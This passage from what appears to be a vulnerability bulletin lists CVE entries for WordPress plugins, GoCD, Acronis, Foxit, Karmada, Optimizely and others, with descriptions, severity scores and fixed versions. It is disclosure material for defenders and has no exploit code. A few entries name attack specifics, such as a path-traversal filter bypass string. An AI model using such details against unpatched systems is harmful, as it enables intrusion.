The WP Job Portal - A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.4 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create jobs for companies that are unaffiliated with the attacker. | 2025-01-03 | 4.3 | CVE-2024-12132 |
| WPKoi--WPKoi Templates for Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPKoi WPKoi Templates for Elementor allows Stored XSS.This issue affects WPKoi Templates for Elementor: from n/a through 3.1.3. | 2025-01-02 | 6.5 | CVE-2024-56241 |
| wpweaver--Turnkey bbPress by WeaverTheme |
The Turnkey bbPress by WeaverTheme plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_wpnonce' parameter in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-04 | 6.1 | CVE-2024-12221 |
| XLPlugins--Finale Lite |
Missing Authorization vulnerability in XLPlugins Finale Lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Finale Lite: from n/a through 2.16.0. | 2025-01-02 | 6.5 | CVE-2023-47180 |
| Xtemos--WoodMart |
Missing Authorization vulnerability in Xtemos WoodMart allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WoodMart: from n/a through 7.2.1. | 2025-01-02 | 5.4 | CVE-2023-32240 |
| xylus--WP Smart Import : Import any XML File to WordPress |
The WP Smart Import : Import any XML File to WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ' page' parameter in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-04 | 6.1 | CVE-2024-12701 |
| YITH--YITH WooCommerce Product Add-Ons |
Missing Authorization vulnerability in YITH YITH WooCommerce Product Add-Ons allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects YITH WooCommerce Product Add-Ons: from n/a through 4.2.0. | 2025-01-02 | 5.3 | CVE-2023-46635 |
| yourownprogrammer--YOP Poll |
Authentication Bypass by Primary Weakness vulnerability in yourownprogrammer YOP Poll allows Authentication Bypass.This issue affects YOP Poll: from n/a through 6.5.28. | 2025-01-02 | 5.3 | CVE-2023-46611 |
| Yulio Aleman Jimenez--Smart Shopify Product |
Missing Authorization vulnerability in Yulio Aleman Jimenez Smart Shopify Product allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Smart Shopify Product: from n/a through 1.0.2. | 2024-12-31 | 6.5 | CVE-2024-56031 |
| ZeroWdd--studentmanager |
A vulnerability, which was classified as critical, has been found in ZeroWdd studentmanager 1.0. This issue affects the function addStudent/editStudent of the file src/main/Java/com/wdd/studentmanager/controller/StudentController. java. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 6.3 | CVE-2024-13133 |
| ZeroWdd--studentmanager |
A vulnerability, which was classified as critical, was found in ZeroWdd studentmanager 1.0. Affected is the function addTeacher/editTeacher of the file src/main/Java/com/wdd/studentmanager/controller/TeacherController. java. The manipulation of the argument file leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 6.3 | CVE-2024-13134 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| Antabot--White-Jotter |
A vulnerability classified as problematic has been found in Antabot White-Jotter up to 0.2.2. Affected is an unknown function of the file /admin/content/editor of the component Article Content Editor. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-30 | 2.4 | CVE-2024-13031 |
| Antabot--White-Jotter |
A vulnerability classified as problematic was found in Antabot White-Jotter up to 0.2.2. Affected by this vulnerability is an unknown functionality of the file /admin/content/editor of the component Article Editor. The manipulation of the argument articleCover leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-30 | 2.7 | CVE-2024-13032 |
| code-projects--Chat System |
A vulnerability, which was classified as problematic, has been found in code-projects Chat System 1.0. Affected by this issue is some unknown functionality of the file /admin/chatroom.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-30 | 3.5 | CVE-2024-13033 |
| code-projects--Chat System |
A vulnerability, which was classified as problematic, was found in code-projects Chat System 1.0. This affects an unknown part of the file /admin/update_user.php. The manipulation of the argument name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-30 | 3.5 | CVE-2024-13034 |
| code-projects--Local Storage Todo App |
A vulnerability has been found in code-projects Local Storage Todo App 1.0 and classified as problematic. This vulnerability affects unknown code of the file /js-todo-app/index.html. The manipulation of the argument Add leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 2.4 | CVE-2025-0228 |
| code-projects--Online Shop |
A vulnerability was found in code-projects Online Shop 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /view.php. The manipulation of the argument name/details leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-03 | 3.5 | CVE-2025-0175 |
| gocd--gocd |
GoCD is a continuous deliver server. GoCD versions 18.9.0 through 24.4.0 (inclusive) can allow GoCD admins to abuse the backup configuration "post-backup script" feature to potentially execute arbitrary scripts on the hosting server or container as GoCD's user, rather than pre-configured scripts. In practice the impact of this vulnerability is limited, as in most configurations a user who can log into the GoCD UI as an admin also has host administration permissions for the host/container that GoCD runs on, in order to manage artifact storage and other service-level configuration options. Additionally, since a GoCD admin has ability to configure and schedule pipelines tasks on all GoCD agents available to the server, the fundamental functionality of GoCD allows co-ordinated task execution similar to that of post-backup-scripts. However in restricted environments where the host administration is separated from the role of a GoCD admin, this may be unexpected. The issue is fixed in GoCD 24.5.0. Post-backup scripts can no longer be executed from within certain sensitive locations on the GoCD server. No known workarounds are available. | 2025-01-03 | 3.8 | CVE-2024-56321 |
| n/a--Emlog Pro |
A vulnerability classified as problematic was found in Emlog Pro up to 2.4.3. This vulnerability affects unknown code of the file /admin/article.php of the component Subpage Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 3.5 | CVE-2024-13132 |
| n/a--Emlog Pro |
A vulnerability has been found in Emlog Pro 2.4.3 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/twitter.php of the component Subpage Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 3.5 | CVE-2024-13135 |
| n/a--Emlog Pro |
A vulnerability classified as problematic has been found in Emlog Pro up to 2.4.3. Affected is an unknown function of the file /admin/article.php?action=upload_cover of the component Cover Upload Handler. The manipulation of the argument image leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 3.5 | CVE-2024-13140 |
| osuuu--LightPicture |
A vulnerability classified as problematic was found in osuuu LightPicture up to 1.2.2. This vulnerability affects unknown code of the file /api/upload of the component SVG File Upload Handler. The manipulation of the argument file leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 3.5 | CVE-2024-13141 |
| PHPGurukul--Land Record System |
A vulnerability classified as problematic has been found in PHPGurukul Land Record System 1.0. This affects an unknown part of the file /index.php. The manipulation of the argument searchdata leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-31 | 3.5 | CVE-2024-13074 |
| PHPGurukul--Land Record System |
A vulnerability classified as problematic was found in PHPGurukul Land Record System 1.0. This vulnerability affects unknown code of the file /admin/add-propertytype.php. The manipulation of the argument Land Property Type leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-31 | 3.5 | CVE-2024-13075 |
| PHPGurukul--Land Record System |
A vulnerability, which was classified as problematic, has been found in PHPGurukul Land Record System 1.0. This issue affects some unknown processing of the file /admin/edit-propertytype.php. The manipulation of the argument Property Type leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-31 | 3.5 | CVE-2024-13076 |
| PHPGurukul--Land Record System |
A vulnerability, which was classified as problematic, was found in PHPGurukul Land Record System 1.0. Affected is an unknown function of the file /admin/add-property.php. The manipulation of the argument Land Subtype leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-31 | 3.5 | CVE-2024-13077 |
| PHPGurukul--Land Record System |
A vulnerability was found in PHPGurukul Land Record System 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/aboutus.php. The manipulation of the argument Page Description leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-31 | 3.5 | CVE-2024-13080 |
| PHPGurukul--Land Record System |
A vulnerability was found in PHPGurukul Land Record System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/contactus.php. The manipulation of the argument Page Description leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-31 | 3.5 | CVE-2024-13081 |
| PHPGurukul--Land Record System |
A vulnerability was found in PHPGurukul Land Record System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/search-property.php. The manipulation of the argument Search By leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-31 | 3.5 | CVE-2024-13082 |
| PHPGurukul--Land Record System |
A vulnerability classified as problematic has been found in PHPGurukul Land Record System 1.0. Affected is an unknown function of the file /admin/admin-profile.php. The manipulation of the argument Admin Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-31 | 3.5 | CVE-2024-13083 |
| SourceCodester--Multi Role Login System |
A vulnerability was found in SourceCodester Multi Role Login System 1.0. It has been classified as problematic. Affected is an unknown function of the file /endpoint/add-user.php. The manipulation of the argument name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-31 | 3.5 | CVE-2024-13069 |
| Trimble--SPS851 |
A vulnerability, which was classified as problematic, has been found in Trimble SPS851 488.01. Affected by this issue is some unknown functionality of the component Receiver Status Identity Tab. The manipulation of the argument System Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-05 | 2.4 | CVE-2025-0219 |
| Trimble--SPS851 |
A vulnerability, which was classified as problematic, was found in Trimble SPS851 488.01. This affects an unknown part of the component Ethernet Configuration Menu. The manipulation of the argument Hostname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-05 | 2.4 | CVE-2025-0220 |
| wangl1989--mysiteforme |
A vulnerability was found in wangl1989 mysiteforme 1.0. It has been classified as problematic. This affects the function RestResponse of the file src/main/java/com/mysiteforme/admin/controller/system/SiteController. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 2.4 | CVE-2024-13137 |
| ZeroWdd--studentmanager |
A vulnerability was found in ZeroWdd studentmanager 1.0. It has been declared as problematic. This vulnerability affects the function submitAddRole of the file src/main/java/com/zero/system/controller/RoleController. java. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. | 2025-01-05 | 2.4 | CVE-2024-13142 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| Acronis--Acronis Cyber Protect 16 |
Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis Cyber Protect 16 (Windows) before build 39169. | 2025-01-02 | not yet calculated | CVE-2024-55540 |
| Acronis--Acronis Cyber Protect 16 |
Stored cross-site scripting (XSS) vulnerability due to missing origin validation in postMessage. The following products are affected: Acronis Cyber Protect 16 (Linux, Windows) before build 39169. | 2025-01-02 | not yet calculated | CVE-2024-55541 |
| Acronis--Acronis Cyber Protect 16 |
Local privilege escalation due to excessive permissions assigned to Tray Monitor service. The following products are affected: Acronis Cyber Protect 16 (Linux, macOS, Windows) before build 39169, Acronis Cyber Protect Cloud Agent (Linux, macOS, Windows) before build 35895. | 2025-01-02 | not yet calculated | CVE-2024-55542 |
| Acronis--Acronis Cyber Protect 16 |
Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis Cyber Protect 16 (Windows) before build 39169. | 2025-01-02 | not yet calculated | CVE-2024-55543 |
| Acronis--Acronis Cyber Protect 16 |
Missing session invalidation after user deletion. The following products are affected: Acronis Cyber Protect 16 (Windows) before build 39169. | 2025-01-02 | not yet calculated | CVE-2024-56413 |
| Acronis--Acronis Cyber Protect 16 |
Web installer integrity check used weak hash algorithm. The following products are affected: Acronis Cyber Protect 16 (Windows) before build 39169. | 2025-01-02 | not yet calculated | CVE-2024-56414 |
| Acronis--Acronis True Image |
Sensitive information disclosure due to insecure folder permissions. The following products are affected: Acronis True Image (Windows) before build 41736. | 2025-01-02 | not yet calculated | CVE-2024-49385 |
| Acronis--Acronis True Image |
Sensitive information disclosure due to missing authentication. The following products are affected: Acronis True Image (macOS) before build 41725, Acronis True Image (Windows) before build 41736. | 2025-01-02 | not yet calculated | CVE-2024-55538 |
| AnyDesk--AnyDesk |
AnyDesk Link Following Information Disclosure Vulnerability. This vulnerability allows local attackers to disclose sensitive information on affected installations of AnyDesk. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of background images. By creating a junction, an attacker can abuse the service to read arbitrary files. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-23940. | 2024-12-30 | not yet calculated | CVE-2024-12754 |
| better-auth--better-auth |
Better Auth is an authentication library for TypeScript. An open redirect vulnerability has been identified in the verify email endpoint of all versions of Better Auth prior to v1.1.6, potentially allowing attackers to redirect users to malicious websites. This issue affects users relying on email verification links generated by the library. The verify email callback endpoint accepts a `callbackURL` parameter. Unlike other verification methods, email verification only uses JWT to verify and redirect without proper validation of the target domain. The origin checker is bypassed in this scenario because it only checks for `POST` requests. An attacker can manipulate this parameter to redirect users to arbitrary URLs controlled by the attacker. Version 1.1.6 contains a patch for the issue. | 2024-12-30 | not yet calculated | CVE-2024-56734 |
| cabraviva--path-sanitizer |
path-sanitizer is a simple lightweight npm package for sanitizing paths to prevent Path Traversal. Prior to 3.1.0, the filters can be bypassed using .=%5c which results in a path traversal. This vulnerability is fixed in 3.1.0. | 2024-12-31 | not yet calculated | CVE-2024-56198 |
| CTFd--CTFd |
While assignment of a user to a team (bracket) in CTFd should be possible only once, at the registration, a flaw in logic implementation allows an authenticated user to reset it's bracket and then pick a new one, joining another team while a competition is already ongoing. This issue impacts releases from 3.7.0 up to 3.7.4 and was addressed by pull request 2636 https://github.com/CTFd/CTFd/pull/2636 included in 3.7.5 release. | 2025-01-02 | not yet calculated | CVE-2024-11716 |
| CTFd--CTFd |
Tokens in CTFd used for account activation and password resetting can be used interchangeably for these operations. When used, they are sent to the server as a GET parameter and they are not single use, which means, that during token expiration time an on-path attacker might reuse such a token to change user's password and take over the account. Moreover, the tokens also include base64 encoded user email. This issue impacts releases up to 3.7.4 and was addressed by pull request 2679 https://github.com/CTFd/CTFd/pull/2679 included in 3.7.5 release. | 2025-01-02 | not yet calculated | CVE-2024-11717 |
| Delta Electronics--DRASimuCAD |
Delta Electronics DRASimuCAD STP File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics DRASimuCAD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of STP files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22414. | 2024-12-30 | not yet calculated | CVE-2024-12834 |
| Delta Electronics--DRASimuCAD |
Delta Electronics DRASimuCAD ICS File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics DRASimuCAD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ICS files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22415. | 2024-12-30 | not yet calculated | CVE-2024-12835 |
| Delta Electronics--DRASimuCAD |
Delta Electronics DRASimuCAD STP File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics DRASimuCAD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of STP files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22450. | 2024-12-30 | not yet calculated | CVE-2024-12836 |
| Forescout--SecureConnector |
A vulnerability in Forescout SecureConnector v11.3.07.0109 on Windows allows unauthenticated user to modify compliance scripts due to insecure temporary directory. | 2025-01-02 | not yet calculated | CVE-2024-9950 |
| Foxit--PDF Reader |
Foxit PDF Reader AcroForm Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of AcroForms. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25344. | 2024-12-30 | not yet calculated | CVE-2024-12751 |
| Foxit--PDF Reader |
Foxit PDF Reader AcroForm Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of AcroForms. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25345. | 2024-12-30 | not yet calculated | CVE-2024-12752 |
| Foxit--PDF Reader |
Foxit PDF Reader Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Foxit PDF Reader. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the product installer. By creating a junction, an attacker can abuse the installer process to create an arbitrary file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-25408. | 2024-12-30 | not yet calculated | CVE-2024-12753 |
| ghostty-org--ghostty |
Ghostty is a cross-platform terminal emulator. Ghostty, as allowed by default in 1.0.0, allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands. This attack requires an attacker to send malicious escape sequences followed by convincing the user to physically press the "enter" key. Fixed in Ghostty v1.0.1. | 2024-12-31 | not yet calculated | CVE-2024-56803 |
| gocd--gocd |
GoCD is a continuous deliver server. GoCD versions prior to 24.5.0 are vulnerable to admin privilege escalation due to improper authorization of access to the admin "Configuration XML" UI feature, and its associated API. A malicious insider/existing authenticated GoCD user with an existing GoCD user account could abuse this vulnerability to access information intended only for GoCD admins, or to escalate their privileges to that of a GoCD admin in a persistent manner. it is not possible for this vulnerability to be abused prior to authentication/login. The issue is fixed in GoCD 24.5.0. GoCD users who are not able to immediate upgrade can mitigate this issue by using a reverse proxy, WAF or similar to externally block access paths with a `/go/rails/` prefix. Blocking this route causes no loss of functionality. If it is not possible to upgrade or block the above route, consider reducing the GoCD user base to more trusted set of users, including temporarily disabling use of plugins such as the guest-login-plugin, which allow limited anonymous access as a regular user account. | 2025-01-03 | not yet calculated | CVE-2024-56320 |
| gocd--gocd |
GoCD is a continuous deliver server. GoCD versions 16.7.0 through 24.4.0 (inclusive) can allow GoCD admins to abuse a hidden/unused configuration repository (pipelines as code) feature to allow XML External Entity (XXE) injection on the GoCD Server which will be executed when GoCD periodically scans configuration repositories for pipeline updates, or is triggered by an administrator or config repo admin. In practice the impact of this vulnerability is limited, in most cases without combining with another vulnerability, as only GoCD (super) admins have the ability to abuse this vulnerability. Typically a malicious GoCD admin can cause much larger damage than that they can do with XXE injection. The issue is fixed in GoCD 24.5.0. As a workaround, prevent external access from the GoCD server to arbitrary locations using some kind of environment egress control. | 2025-01-03 | not yet calculated | CVE-2024-56322 |
| gocd--gocd |
GoCD is a continuous deliver server. GoCD versions prior to 24.4.0 can allow GoCD "group admins" to abuse ability to edit the raw XML configuration for groups they administer to trigger XML External Entity (XXE) injection on the GoCD server. Theoretically, the XXE vulnerability can result in additional attacks such as SSRF, information disclosure from the GoCD server, and directory traversal, although these additional attacks have not been explicitly demonstrated as exploitable. This issue is fixed in GoCD 24.5.0. Some workarounds are available. One may temporarily block access to `/go/*/pipelines/snippet` routes from an external reverse proxy or WAF if one's "group admin" users do not need the functionality to edit the XML of pipelines directly (rather than using the UI, or using a configuration repository). One may also prevent external access from one's GoCD server to arbitrary locations using some kind of environment egress control. | 2025-01-03 | not yet calculated | CVE-2024-56324 |
| Google--Android |
In prepare_response_locked of lwis_transaction.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-03 | not yet calculated | CVE-2024-53833 |
| Infinix Mobile--com.rlk.weathers |
Infinix devices contain a pre-loaded "com.rlk.weathers" application, that exposes an unsecured content provider. An attacker can communicate with the provider and reveal the user's location without any privileges. After multiple attempts to contact the vendor we did not receive any answer. We suppose this issue affects all Infinix Mobile devices. | 2024-12-30 | not yet calculated | CVE-2024-12993 |
| InfotelGLPI--tasklists |
Tasklists provides plugin tasklists for GLPI. Versions prior to 2.0.4 have a blind SQL injection vulnerability. Version 2.0.4 contains a patch for the vulnerability. | 2024-12-30 | not yet calculated | CVE-2024-56801 |
| iXsystems--TrueNAS CORE |
iXsystems TrueNAS CORE tarfile.extractall Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of iXsystems TrueNAS devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the tarfile.extractall method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of root. Was ZDI-CAN-25626. | 2024-12-30 | not yet calculated | CVE-2024-11944 |
| iXsystems--TrueNAS CORE |
iXsystems TrueNAS CORE fetch_plugin_packagesites tar Cleartext Transmission of Sensitive Information Vulnerability. This vulnerability allows network-adjacent attackers to tamper with firmware update files on affected installations of iXsystems TrueNAS devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of firmware updates. The issue results from the use of an insecure protocol to deliver updates. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-25668. | 2024-12-30 | not yet calculated | CVE-2024-11946 |
| karmada-io--karmada |
Karmada is a Kubernetes management system that allows users to run cloud-native applications across multiple Kubernetes clusters and clouds. Prior to version 1.12.0, the PULL mode clusters registered with the `karmadactl register` command have excessive privileges to access control plane resources. By abusing these permissions, an attacker able to authenticate as the karmada-agent to a karmada cluster would be able to obtain administrative privileges over the entire federation system including all registered member clusters. Since Karmada v1.12.0, command `karmadactl register` restricts the access permissions of pull mode member clusters to control plane resources. This way, an attacker able to authenticate as the karmada-agent cannot control other member clusters in Karmada. As a workaround, one may restrict the access permissions of pull mode member clusters to control plane resources according to Karmada Component Permissions Docs. | 2025-01-03 | not yet calculated | CVE-2024-56513 |
| karmada-io--karmada |
Karmada is a Kubernetes management system that allows users to run cloud-native applications across multiple Kubernetes clusters and clouds. Prior to version 1.12.0, both in karmadactl and karmada-operator, it is possible to supply a filesystem path, or an HTTP(s) URL to retrieve the custom resource definitions(CRDs) needed by Karmada. The CRDs are downloaded as a gzipped tarfile and are vulnerable to a TarSlip vulnerability. An attacker able to supply a malicious CRD file into a Karmada initialization could write arbitrary files in arbitrary paths of the filesystem. From Karmada version 1.12.0, when processing custom CRDs files, CRDs archive verification is utilized to enhance file system robustness. A workaround is available. Someone who needs to set flag `--crd` to customize the CRD files required for Karmada initialization when using `karmadactl init` to set up Karmada can manually inspect the CRD files to check whether they contain sequences such as `../` that would alter file paths, to determine if they potentially include malicious files. When using karmada-operator to set up Karmada, one must upgrade one's karmada-operator to one of the fixed versions. | 2025-01-03 | not yet calculated | CVE-2024-56514 |
| Kentico--Kentico CMS |
Kentico CMS in version 7 is vulnerable to a Reflected XSS attacks through manipulation of a specific GET request parameter sent to /CMSMessages/AccessDenied.aspx endpoint. Notably, support for this version of Kentico ended in 2016. Version 8 was tested as well and does not contain this vulnerability. | 2025-01-02 | not yet calculated | CVE-2024-12907 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: media: s5p_cec: limit msg.len to CEC_MAX_MSG_SIZE I expect that the hardware will have limited this to 16, but just in case it hasn't, check for this corner case. | 2025-01-02 | not yet calculated | CVE-2022-49035 |
| lm-sys--lm-sys/fastchat |
A Server-Side Request Forgery (SSRF) vulnerability exists in the POST /worker_generate_stream API endpoint of the Controller API Server in lm-sys/fastchat, as of commit e208d5677c6837d590b81cb03847c0b9de100765. This vulnerability allows attackers to exploit the victim controller API server's credentials to perform unauthorized web actions or access unauthorized web resources by combining it with the POST /register_worker endpoint. | 2024-12-30 | not yet calculated | CVE-2024-10044 |
| n/a--n/a |
An issue was discovered in Optimizely Configured Commerce before 5.2.2408. A medium-severity input validation issue exists in the Commerce B2B application, affecting the Contact Us functionality. This allows visitors to send e-mail messages that could contain unfiltered HTML markup in specific scenarios. | 2025-01-04 | not yet calculated | CVE-2025-22383 |
| n/a--n/a |
An issue was discovered in Optimizely Configured Commerce before 5.2.2408. A medium-severity issue concerning business logic exists in the Commerce B2B application, which allows storefront visitors to purchase discontinued products in specific scenarios where requests are altered before reaching the server. | 2025-01-04 | not yet calculated | CVE-2025-22384 |
| n/a--n/a |
An issue was discovered in Optimizely Configured Commerce before 5.2.2408. For newly created accounts, the Commerce B2B application does not require email confirmation. This medium-severity issue allows the mass creation of accounts. This could affect database storage; also, non-requested storefront accounts can be created on behalf of visitors. | 2025-01-04 | not yet calculated | CVE-2025-22385 |
| n/a--n/a |
An issue was discovered in Optimizely Configured Commerce before 5.2.2408. A medium-severity session issue exists in the Commerce B2B application, affecting the longevity of active sessions in the storefront. This allows session tokens tied to logged-out sessions to still be active and usable. | 2025-01-04 | not yet calculated | CVE-2025-22386 |
| n/a--n/a |
An issue was discovered in Optimizely Configured Commerce before 5.2.2408. A medium-severity issue exists in requests for resources where the session token is submitted as a URL parameter. This exposes information about the authenticated session, which can be leveraged for session hijacking. | 2025-01-04 | not yet calculated | CVE-2025-22387 |
| n/a--n/a |
An issue was discovered in Optimizely EPiServer.CMS.Core before 12.22.0. A high-severity Stored Cross-Site Scripting (XSS) vulnerability exists in the CMS, allowing malicious actors to inject and execute arbitrary JavaScript code, potentially compromising user data, escalating privileges, or executing unauthorized actions. The issue exists in multiple areas, including content editing, link management, and file uploads. | 2025-01-04 | not yet calculated | CVE-2025-22388 |
| n/a--n/a |
An issue was discovered in Optimizely EPiServer.CMS.Core before 12.32.0. A medium-severity vulnerability exists in the CMS, where the application does not properly validate uploaded files. This allows the upload of potentially malicious file types, including .docm .html. When accessed by application users, these files can be used to execute malicious actions or compromise users' systems. | 2025-01-04 | not yet calculated | CVE-2025-22389 |
| n/a--n/a |
An issue was discovered in Optimizely EPiServer.CMS.Core before 12.32.0. A medium-severity vulnerability exists in the CMS due to insufficient enforcement of password complexity requirements. The application permits users to set passwords with a minimum length of 6 characters, lacking adequate complexity to resist modern attack techniques such as password spraying or offline password cracking. | 2025-01-04 | not yet calculated | CVE-2025-22390 |
| PacoVK--tapir |
Tapir is a private Terraform registry. Tapir versions 0.9.0 and 0.9.1 are facing a critical issue with scope-able Deploykeys where attackers can guess the key to get write access to the registry. User must upgrade to 0.9.2. | 2024-12-31 | not yet calculated | CVE-2024-56802 |
| PHPOffice--PhpSpreadsheet |
PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. Versions prior to 3.7.0, 2.3.5, 2.1.6, and 1.29.7 are vulnerable to unauthorized reflected cross-site scripting in the constructor of the `Downloader` class. Using the `/vendor/phpoffice/phpspreadsheet/samples/download.php` script, an attacker can perform a cross-site scripting attack. Versions 3.7.0, 2.3.5, 2.1.6, and 1.29.7 contain a patch for the issue. | 2025-01-03 | not yet calculated | CVE-2024-56365 |
| PHPOffice--PhpSpreadsheet |
PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. Versions prior to 3.7.0, 2.3.5, 2.1.6, and 1.29.7 are vulnerable to unauthorized reflected cross-site scripting in the `Accounting.php` file. Using the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Accounting.php` script, an attacker can perform a cross-site scripting attack. Versions 3.7.0, 2.3.5, 2.1.6, and 1.29.7 contain a patch for the issue. | 2025-01-03 | not yet calculated | CVE-2024-56366 |
| PHPOffice--PhpSpreadsheet |
PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. Versions prior to 3.7.0, 2.3.5, 2.1.6, and 1.29.7 have no sanitization in the `/vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php` file, which leads to the possibility of a cross-site scripting attack. Versions 3.7.0, 2.3.5, 2.1.6, and 1.29.7 contain a patch for the issue. | 2025-01-03 | not yet calculated | CVE-2024-56408 |
